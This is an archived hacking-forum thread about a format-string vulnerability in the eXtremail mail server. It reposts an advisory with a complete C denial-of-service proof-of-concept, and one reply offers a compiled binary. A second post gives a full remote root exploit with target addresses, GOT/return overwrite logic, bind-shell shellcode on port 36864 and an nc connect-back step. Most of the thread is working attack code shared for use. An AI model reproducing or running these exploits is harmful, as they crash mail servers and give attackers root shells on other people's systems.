hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Extremail
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Apr 27 2004, 03:04 PM
QUOTE

Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What's eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack ,SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers  to various SMTP,POP and IMAP commands.
The vulnerability has been reported to affect some previous versions
(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted
to regain its functionality (Smptd,Pop3d,Imapd,Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                          *
*  eXtremail 1.5.x Denial of Service          *
*                                            *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                            *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

int sockfd; 
char buf[MAXRECVSIZE];
struct hostent *he;
struct sockaddr_in their_addr;
char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL)
    { 
      perror("gethostbyname");
      exit(1);
    }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror("socket");
      exit(1);
    }

their_addr.sin_family = AF_INET; 
their_addr.sin_port = htons(PORT); 
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
      perror("connect");
      exit(1);
    }

 
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
    {
      perror("recv");
      exit(1);
    }

buf[numbytes] = '\0';

  if (TYPE == 0)
    {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
    }

close(sockfd);

}



int main(int argc, char *argv[])
{
   
printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2)
  {   
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
  }

crash(argv[1],0);
numbytes=0;
printf ("\n[+] Checking server status ...\n");


if(!fork()) crash(argv[1],1);
sleep(5);
if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

return 0;


}

-------------------------------



Solution:
No solution available at the moment.

Psychotec
Apr 27 2004, 03:24 PM
compiled it for ya....

you can download >HERE<

enjoy smile.gif
qcred11
Apr 27 2004, 07:48 PM
Thanks man.
By the way I got the latest code:

QUOTE

/*  Remote Format Strings Exploit for eXtremail latest versions.  */
/*  ============================================================  */
/*        */
/*              By B-r00t <br00t@blueyonder.co.uk>        */       
/*                                                            */
/* Date:  02/07/2003    */
/* Reference:      http://www.extremail.com/  */
/* Versions:      Linux eXtremail-1.5-8 => VULNERABLE  */
/*  Linux eXtremail-1.5-5 => VULNERABLE  */ 
/*        */
/* Exploit: eXtreme.c      */
/*  Compile: gcc -o eXtreme eXtreme.c    */
/*        */
/* Exploit uses format strings bug in fLog() of smtpd to bind a  */
/* r00tshell to port 36864 on the target eXtremail server.  */
/*        */
/* Methods of exploitation.    */
/* ------------------------    */
/*  eXtremail-1.5-5.i686.rpm use format strings bug to overwrite */
/* GOT of fflush() to point to shellcode.    */
/*        */
/* eXtremail-1.5-8.i586.rpm is a static binary so its not  */
/* possible to abuse GOT. Saved RET address is overwritten  */
/* to point to shellcode.      */
/*        */
/* New Releases with old bugs? => FIX IT!    */
/*        */
/* THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!  */
/*        */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"
#define DEST_PORT 25

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)",  0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)",  0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",  0xbefff0c8, 0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",  0x44434241, 0xaaaaaaaa, 1, 266, 44},
        { 0 }
};

int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. © 2003\n", EXPLOIT);

if (argc < 3)
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3)
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}


void usage (void)
{
        int loop;
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
for (loop = 0; targets[loop].systemtype; loop++)
  printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
exit (-1);
        }


int get_sock (char *host)
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



int send_sock (char *stuff)
{
int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
}
printf ("Send:\t%s", stuff);
return bytes;
}


int read_sock (void)
{
        int bytes;
char buffer[200];
char *ptr;
ptr = buffer;
memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
}
printf ("Recv:\t%s", buffer);
return bytes;
}


int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];

RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

for (loop=0; loop<4; loop++) {
    if (r[loop] > sofar) {
      w[loop] = r[loop]-sofar;
      } else
    if (r[loop] == sofar) {
      w[loop] = 0;
      }else
    if (r[loop] < sofar) {
      w[loop] = (256-sofar)+r[loop];
      }
    sofar = sofar+w[loop];
    }

bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

/*                                                                                                        */
/*    B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> ©              */
/*      "If You Can't B-r00t Then Just B#."                                              */
/*                                                                                                    */
/*  ENJOY!                                                                            */



This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.